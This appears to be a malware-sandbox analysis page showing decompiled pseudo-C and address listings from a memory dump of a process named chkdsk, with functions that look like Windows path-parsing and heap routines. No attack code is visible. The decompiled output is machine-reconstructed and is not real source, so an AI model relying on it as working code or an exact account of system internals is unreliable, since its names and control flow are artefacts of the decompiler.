																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04E54CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04DDD130(_t427, _t494, _t511);
				}
			}










































































                                                      0x04e55ba5
                                                      0x04e55baa
                                                      0x04e55baf
                                                      0x04e55bb4
                                                      0x04e55bb6
                                                      0x04e55bbc
                                                      0x04e55bbe
                                                      0x04e55bc4
                                                      0x04e55bcd
                                                      0x04e55bd3
                                                      0x04e55bd6
                                                      0x04e55bdc
                                                      0x04e55be0
                                                      0x04e55be3
                                                      0x04e55beb
                                                      0x04e55bf2
                                                      0x04e55bf8
                                                      0x04e55bfe
                                                      0x04e55c04
                                                      0x04e55c0e
                                                      0x04e55c18
                                                      0x04e55c1f
                                                      0x04e55c25
                                                      0x04e55c2a
                                                      0x04e55c2c
                                                      0x04e55c32
                                                      0x04e55c3a
                                                      0x04e55c3f
                                                      0x04e55c42
                                                      0x04e55c48
                                                      0x04e55c5b
                                                      0x04e55c5b
                                                      0x04e55c2c
                                                      0x04e55cb7
                                                      0x04e55cb9
                                                      0x04e55cbf
                                                      0x04e55cc2
                                                      0x04e55cca
                                                      0x04e55ccb
                                                      0x04e55ccb
                                                      0x04e55cd1
                                                      0x04e55cd7
                                                      0x04e55cda
                                                      0x04e55ce1
                                                      0x04e55ce4
                                                      0x04e55ce7
                                                      0x04e55ced
                                                      0x04e55cf3
                                                      0x04e55cf9
                                                      0x04e55cff
                                                      0x04e55d08
                                                      0x04e55d0a
                                                      0x04e55d0e
                                                      0x04e55d10
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55d16
                                                      0x04e55d1a
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55d20
                                                      0x04e55d22
                                                      0x04e55d25
                                                      0x04e55d2f
                                                      0x04e55d2f
                                                      0x04e55d33
                                                      0x04e55d3d
                                                      0x04e55d49
                                                      0x04e55d4b
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55d5a
                                                      0x04e55d5d
                                                      0x04e55d60
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55d66
                                                      0x04e55d69
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55d6f
                                                      0x04e55d6f
                                                      0x04e55d73
                                                      0x04e55d79
                                                      0x04e55d7f
                                                      0x04e55d86
                                                      0x04e55d95
                                                      0x04e55d98
                                                      0x04e55dba
                                                      0x04e55dcb
                                                      0x04e55dce
                                                      0x04e55dd3
                                                      0x04e55dd6
                                                      0x04e55dd8
                                                      0x04e55de6
                                                      0x04e55dec
                                                      0x04e55dee
                                                      0x04e55df1
                                                      0x04e55df3
                                                      0x04e5635a
                                                      0x04e5635a
                                                      0x00000000
                                                      0x04e5635a
                                                      0x04e55dfe
                                                      0x04e55e02
                                                      0x04e55e05
                                                      0x04e55e07
                                                      0x04e55e10
                                                      0x04e55e13
                                                      0x04e55e1b
                                                      0x04e55e1c
                                                      0x04e55e21
                                                      0x04e55e22
                                                      0x04e55e23
                                                      0x04e55e25
                                                      0x04e55e2a
                                                      0x04e55e2c
                                                      0x04e55e2e
                                                      0x04e55e36
                                                      0x04e55e39
                                                      0x04e55e42
                                                      0x04e55e47
                                                      0x04e55e4d
                                                      0x04e55e54
                                                      0x04e55e54
                                                      0x04e55e54
                                                      0x04e55e2e
                                                      0x04e55e5c
                                                      0x04e55e5f
                                                      0x04e55e62
                                                      0x04e55e64
                                                      0x04e55e6b
                                                      0x04e55e70
                                                      0x04e55e7a
                                                      0x04e55e7a
                                                      0x04e55e7a
                                                      0x04e55e6b
                                                      0x04e55e7e
                                                      0x04e55e7f
                                                      0x04e55e7f
                                                      0x04e55e81
                                                      0x04e55e87
                                                      0x04e55e8b
                                                      0x04e55e8c
                                                      0x04e55e8c
                                                      0x04e55e8c
                                                      0x04e55e9a
                                                      0x04e55e9c
                                                      0x04e55ea2
                                                      0x04e55ea6
                                                      0x04e55f50
                                                      0x04e55f50
                                                      0x04e55f57
                                                      0x04e55f66
                                                      0x04e55f66
                                                      0x04e55f66
                                                      0x04e55f68
                                                      0x04e55f6a
                                                      0x04e563d0
                                                      0x00000000
                                                      0x04e55f70
                                                      0x04e55f70
                                                      0x04e55f91
                                                      0x04e55f9c
                                                      0x04e55f9e
                                                      0x04e55fa4
                                                      0x04e55fa6
                                                      0x04e5638c
                                                      0x04e56392
                                                      0x04e563a1
                                                      0x04e563a7
                                                      0x04e563af
                                                      0x04e563af
                                                      0x04e563bd
                                                      0x04e563d8
                                                      0x00000000
                                                      0x04e563d8
                                                      0x04e55fac
                                                      0x04e55fb2
                                                      0x04e55fb4
                                                      0x04e55fbd
                                                      0x04e55fc6
                                                      0x04e55fce
                                                      0x04e55fd4
                                                      0x04e55fdc
                                                      0x04e55fec
                                                      0x04e55fed
                                                      0x04e55fee
                                                      0x04e55fef
                                                      0x04e55ff9
                                                      0x04e55ffa
                                                      0x04e55ffb
                                                      0x04e55ffc
                                                      0x04e56000
                                                      0x04e56004
                                                      0x04e56012
                                                      0x04e56012
                                                      0x04e56018
                                                      0x04e56019
                                                      0x04e5601a
                                                      0x04e5601b
                                                      0x04e5601c
                                                      0x04e56020
                                                      0x04e56059
                                                      0x04e5605c
                                                      0x04e56061
                                                      0x04e56061
                                                      0x04e56022
                                                      0x04e56022
                                                      0x04e56022
                                                      0x04e56025
                                                      0x04e5602a
                                                      0x04e5602b
                                                      0x04e56031
                                                      0x04e56037
                                                      0x04e56038
                                                      0x04e5603e
                                                      0x04e56048
                                                      0x04e56049
                                                      0x04e5604a
                                                      0x04e5604b
                                                      0x04e5604c
                                                      0x04e5604d
                                                      0x04e56053
                                                      0x04e56054
                                                      0x04e56054
                                                      0x04e56062
                                                      0x04e56065
                                                      0x04e56067
                                                      0x04e5606a
                                                      0x04e56070
                                                      0x04e56075
                                                      0x04e56076
                                                      0x04e56081
                                                      0x04e56087
                                                      0x04e56095
                                                      0x04e56099
                                                      0x04e5609e
                                                      0x04e560a4
                                                      0x04e560ae
                                                      0x04e560b0
                                                      0x04e560b3
                                                      0x04e560b6
                                                      0x04e560b8
                                                      0x04e560ba
                                                      0x04e560ba
                                                      0x04e560ba
                                                      0x04e560ba
                                                      0x04e560be
                                                      0x04e560c0
                                                      0x04e560c5
                                                      0x04e560c5
                                                      0x04e560c5
                                                      0x04e560c6
                                                      0x04e560cd
                                                      0x04e56114
                                                      0x04e560cf
                                                      0x04e560cf
                                                      0x04e560d4
                                                      0x04e560d5
                                                      0x04e560da
                                                      0x04e560db
                                                      0x04e560e1
                                                      0x04e560e2
                                                      0x04e560e8
                                                      0x04e560f8
                                                      0x04e560fd
                                                      0x04e560fe
                                                      0x04e56102
                                                      0x04e56104
                                                      0x04e56107
                                                      0x04e56109
                                                      0x04e5610b
                                                      0x04e5610b
                                                      0x04e5610b
                                                      0x04e5610b
                                                      0x04e5610f
                                                      0x04e5610f
                                                      0x04e56117
                                                      0x04e5611a
                                                      0x04e5611f
                                                      0x04e56125
                                                      0x04e56134
                                                      0x04e56139
                                                      0x04e5613f
                                                      0x04e56146
                                                      0x04e56148
                                                      0x04e5614b
                                                      0x04e5614d
                                                      0x04e5614f
                                                      0x04e5614f
                                                      0x04e5614f
                                                      0x04e5614f
                                                      0x04e56153
                                                      0x04e56159
                                                      0x04e56159
                                                      0x04e5615c
                                                      0x04e56163
                                                      0x04e56169
                                                      0x04e5616c
                                                      0x04e56172
                                                      0x04e56181
                                                      0x04e56186
                                                      0x04e56187
                                                      0x04e5618b
                                                      0x04e56191
                                                      0x04e56195
                                                      0x04e561a3
                                                      0x04e561bb
                                                      0x04e561c0
                                                      0x04e561c3
                                                      0x04e561cc
                                                      0x04e561d0
                                                      0x04e561dc
                                                      0x04e561de
                                                      0x04e561e1
                                                      0x04e561e4
                                                      0x04e561e6
                                                      0x04e561e8
                                                      0x04e561e8
                                                      0x04e561e8
                                                      0x04e561e8
                                                      0x04e561e6
                                                      0x04e561ec
                                                      0x04e561f3
                                                      0x04e56203
                                                      0x04e56209
                                                      0x04e5620a
                                                      0x04e56216
                                                      0x04e5621d
                                                      0x04e56227
                                                      0x04e56241
                                                      0x04e56246
                                                      0x04e5624c
                                                      0x04e56257
                                                      0x04e56259
                                                      0x04e5625c
                                                      0x04e5625e
                                                      0x04e56260
                                                      0x04e56260
                                                      0x04e56260
                                                      0x04e56260
                                                      0x04e5625e
                                                      0x04e56264
                                                      0x04e56267
                                                      0x04e56269
                                                      0x04e56315
                                                      0x04e56315
                                                      0x04e5631b
                                                      0x04e5631e
                                                      0x04e56324
                                                      0x04e56327
                                                      0x04e5632f
                                                      0x04e56330
                                                      0x04e56333
                                                      0x04e5633a
                                                      0x04e5633c
                                                      0x04e56335
                                                      0x04e56335
                                                      0x04e56335
                                                      0x04e5633f
                                                      0x04e56342
                                                      0x04e5634c
                                                      0x04e56352
                                                      0x04e56355
                                                      0x04e56355
                                                      0x04e56359
                                                      0x00000000
                                                      0x04e5626f
                                                      0x04e56275
                                                      0x04e56275
                                                      0x04e56278
                                                      0x04e5627e
                                                      0x04e5627e
                                                      0x04e56281
                                                      0x04e56287
                                                      0x04e5628d
                                                      0x04e56298
                                                      0x04e5629c
                                                      0x04e562a2
                                                      0x04e5629e
                                                      0x04e5629e
                                                      0x04e5629e
                                                      0x04e562a7
                                                      0x04e562a7
                                                      0x04e562aa
                                                      0x04e562b0
                                                      0x04e562f0
                                                      0x04e562f0
                                                      0x04e562f2
                                                      0x04e562f8
                                                      0x04e562fd
                                                      0x04e562b2
                                                      0x04e562b2
                                                      0x04e562b2
                                                      0x04e562b5
                                                      0x04e562dd
                                                      0x04e562e2
                                                      0x04e562e5
                                                      0x04e562b7
                                                      0x04e562b8
                                                      0x04e562bb
                                                      0x04e562bd
                                                      0x04e562c0
                                                      0x04e562c4
                                                      0x04e562cd
                                                      0x04e562cd
                                                      0x04e562c0
                                                      0x04e562bb
                                                      0x04e562b5
                                                      0x04e56302
                                                      0x04e56303
                                                      0x04e56305
                                                      0x04e56305
                                                      0x04e56305
                                                      0x04e5630c
                                                      0x04e5630c
                                                      0x00000000
                                                      0x04e5627e
                                                      0x04e56269
                                                      0x04e55eac
                                                      0x04e55ebb
                                                      0x04e55ebe
                                                      0x04e55ecb
                                                      0x04e55ecb
                                                      0x04e55ece
                                                      0x04e55ece
                                                      0x04e55ed4
                                                      0x04e55ed7
                                                      0x04e55ed9
                                                      0x04e55edb
                                                      0x04e55edb
                                                      0x04e55ee1
                                                      0x04e55ee1
                                                      0x04e55ee3
                                                      0x04e55f20
                                                      0x04e55f20
                                                      0x04e55ee5
                                                      0x04e55ee5
                                                      0x04e55ee5
                                                      0x04e55ee8
                                                      0x04e55f11
                                                      0x04e55f18
                                                      0x04e55eea
                                                      0x04e55eea
                                                      0x04e55eed
                                                      0x04e55ef2
                                                      0x04e55ef8
                                                      0x04e55efb
                                                      0x04e55f0a
                                                      0x04e55f0a
                                                      0x04e55eed
                                                      0x04e55ee8
                                                      0x04e55f22
                                                      0x04e55f28
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55f30
                                                      0x04e55f31
                                                      0x04e55f37
                                                      0x04e55f3a
                                                      0x04e55f3d
                                                      0x04e55f44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55f46
                                                      0x04e55f48
                                                      0x04e55f4d
                                                      0x00000000
                                                      0x04e55f4d
                                                      0x04e55dda
                                                      0x04e55ddf
                                                      0x00000000
                                                      0x04e55ddf
                                                      0x04e55dd8
                                                      0x04e55da7
                                                      0x04e55da9
                                                      0x04e55dac
                                                      0x04e55dae
                                                      0x00000000
                                                      0x04e55db4
                                                      0x04e55db4
                                                      0x00000000
                                                      0x04e55db4
                                                      0x04e55dae
                                                      0x04e55d88
                                                      0x04e55d8d
                                                      0x04e56363
                                                      0x04e56369
                                                      0x04e5636a
                                                      0x04e56370
                                                      0x04e56372
                                                      0x04e5637a
                                                      0x04e5637b
                                                      0x04e5637d
                                                      0x00000000
                                                      0x00000000
                                                      0x04e5637f
                                                      0x04e56385
                                                      0x00000000
                                                      0x04e56385
                                                      0x04e55d38
                                                      0x04e55d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55d3b
                                                      0x04e55d27
                                                      0x04e55d29
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e56360
                                                      0x00000000
                                                      0x04e56360
                                                      0x04e55c10
                                                      0x04e55c10
                                                      0x04e563da
                                                      0x04e563e5
                                                      0x04e563e5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85001d081fca8a707d1f4c241de40d37db93f10fbbed4a241b39fd512dd0d405
                                                      • Instruction ID: c5aca6ec22f722caaf175e343b4cb90b749f2573c0718d89c066fb7cd7cddf8b
                                                      • Opcode Fuzzy Hash: 85001d081fca8a707d1f4c241de40d37db93f10fbbed4a241b39fd512dd0d405
                                                      • Instruction Fuzzy Hash: BF425C75A00229DFDB24CF68C880BA9B7B1FF45318F5481EAD94DEB252E734A985CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DA4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E04DA4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4e7d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04DBF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04DA6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04DA4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04DA6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04DA45F8))) {
												case 0:
													_v568 = 0x4d61078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4d611c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04DA4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04DCF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04DCF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04D852A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04D9EB70(1, 0x4e779a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04D9AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04DC95D0();
																			L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04DCB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04DC3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04DCB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                      0x04da4128
                                                      0x04da4135
                                                      0x04da413c
                                                      0x04da4141
                                                      0x04da4145
                                                      0x04da4147
                                                      0x04da414e
                                                      0x04da4151
                                                      0x04da4159
                                                      0x04da415c
                                                      0x04da4160
                                                      0x04da4164
                                                      0x04da4168
                                                      0x04da416c
                                                      0x04da417f
                                                      0x04da4181
                                                      0x04da446a
                                                      0x04da446a
                                                      0x04da418c
                                                      0x04da4195
                                                      0x04da4199
                                                      0x04da4432
                                                      0x04da4439
                                                      0x04da443d
                                                      0x04da4442
                                                      0x04da4447
                                                      0x00000000
                                                      0x04da419f
                                                      0x04da41a3
                                                      0x04da41b1
                                                      0x04da41b9
                                                      0x04da41bd
                                                      0x04da45db
                                                      0x04da45db
                                                      0x00000000
                                                      0x04da41c3
                                                      0x04da41c3
                                                      0x04da41ce
                                                      0x04da41d4
                                                      0x04dee138
                                                      0x04dee13e
                                                      0x04dee169
                                                      0x04dee16d
                                                      0x04dee19e
                                                      0x04dee16f
                                                      0x04dee16f
                                                      0x04dee175
                                                      0x04dee179
                                                      0x04dee18f
                                                      0x04dee193
                                                      0x00000000
                                                      0x04dee199
                                                      0x00000000
                                                      0x04dee199
                                                      0x04dee193
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da41da
                                                      0x04da41da
                                                      0x04da41df
                                                      0x04da41e4
                                                      0x04da41ec
                                                      0x04da4203
                                                      0x04da4207
                                                      0x04dee1fd
                                                      0x04da4222
                                                      0x04da4226
                                                      0x04dee1f3
                                                      0x04dee1f3
                                                      0x04da422c
                                                      0x04da422c
                                                      0x04da4233
                                                      0x04dee1ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da4239
                                                      0x04da4239
                                                      0x04da4239
                                                      0x04da4239
                                                      0x04da4233
                                                      0x04da4226
                                                      0x04da41ee
                                                      0x04da41ee
                                                      0x04da41f4
                                                      0x04da4575
                                                      0x04dee1b1
                                                      0x04dee1b1
                                                      0x00000000
                                                      0x04da457b
                                                      0x04da457b
